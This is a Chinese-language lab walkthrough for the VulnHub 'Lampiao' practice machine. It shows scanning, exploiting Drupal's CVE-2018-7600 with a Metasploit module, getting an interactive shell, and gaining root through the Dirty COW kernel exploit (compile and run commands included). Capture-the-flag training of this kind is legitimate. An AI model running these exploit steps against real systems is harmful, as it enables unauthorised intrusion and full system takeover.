下载地址
https://www.vulnhub.com/entry/lampiao-1,249/
选择NAT模式或桥接模式都可以
目标
得到root权限
信息收集
kali的ip是192.168.174.129
靶机:Lampiao
扫下c段 发现靶机ip 192.168.174.4
靶机:Lampiao
开启了 22 80端口 进入80端口看下 然后查看页面源代码 没有发现东西
靶机:Lampiao
dirb扫下目录 发现扫不到东西
靶机:Lampiao
最后用nmap扫描一下 发现多开放了一个端口
靶机:Lampiao
靶机:Lampiao
在网页下面发现一个标志
靶机:Lampiao
百度下相关文章 好像存在一个远程代码执行 cve 2018 7600漏洞
靶机:Lampiao
去msf看一下相关的漏洞
靶机:Lampiao
选择2018年的这个
靶机:Lampiao
靶机:Lampiao
use exploit/unix/webapp/drupal_drupalgeddon2
set rhosts 192.168.174.4
set rport 1898
set target 0
run
然后执行这条命令才可以展开后续操作 sessions 1
靶机:Lampiao
拿到session会话,输入shell进入shell终端 再利用python获得一个TTL终端
python -c ‘import pty; pty.spawn("/bin/bash")’
靶机:Lampiao
使用uname -a 打印所有可用的系统信息
靶机:Lampiao
发现linux内核更新时间为2016年七月13号,因该存在CVE-2016-5195 ,也就是脏牛(Dirty Cow)漏洞
漏洞范围:
Linux kernel >= 2.6.22(2007年发行,到2016年10月18日才修复)

危害:
低权限用户利用该漏洞可以在众多Linux系统上实现本地提权

简要分析:
该漏洞具体为,get_user_page内核函数在处理Copy-on-Write(以下使用COW表示)的过程中,可能产出竞态条件造成COW过程被破坏,导致出现写数据到进程地址空间内只读内存区域的机会。修改su或者passwd程序就可以达到root的目的。具体分析请查看官方分析。

在Kali中自带脏牛的脚本文件,打开新的终端,输入searchsploit dirty,找到需要的文件路径。
靶机:Lampiao
按ctrl+c返回控制台
靶机:Lampiao
执行此命令upload /usr/share/exploitdb/exploits/linux/local/40847.cpp
上传cpp文件到/tmp目录下,因为该目录一般是所有用户都具有可读可写权限
靶机:Lampiao
再次使用shell进入shell终端,使用python -c 'import pty; pty.spawn("/bin/bash")'进入TTL终端
上传成功后使用gcc进行编译
靶机:Lampiao
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
1-Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
2-pedantic 允许发出ANSI/ISO C标准所列出的所有警告
3-O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高
4-std=c++11就是用按C++2011标准来编译的
5-pthread 在Linux中要用到多线程时,需要链接pthread库
6-o dcow gcc生成的目标文件,名字为dcow
再运行编译后文件并将结果输出到一个文本中./dcow > status.txt
靶机:Lampiao
再次使用./dcow > status.txt 看到密码已经被重置
靶机:Lampiao
提权成功
靶机:Lampiao
靶机:Lampiao

本人小白一枚,在做题过程中看了很多大佬的文章,万分感激。

相关文章:

  • 2021-10-31
  • 2021-07-21
  • 2021-05-12
  • 2021-11-30
  • 2021-06-23
  • 2021-05-19
  • 2021-09-16
  • 2021-06-03
猜你喜欢
  • 2021-11-29
  • 2022-01-20
  • 2021-06-29
  • 2021-12-28
  • 2021-09-18
  • 2021-07-16
  • 2021-07-21
相关资源
相似解决方案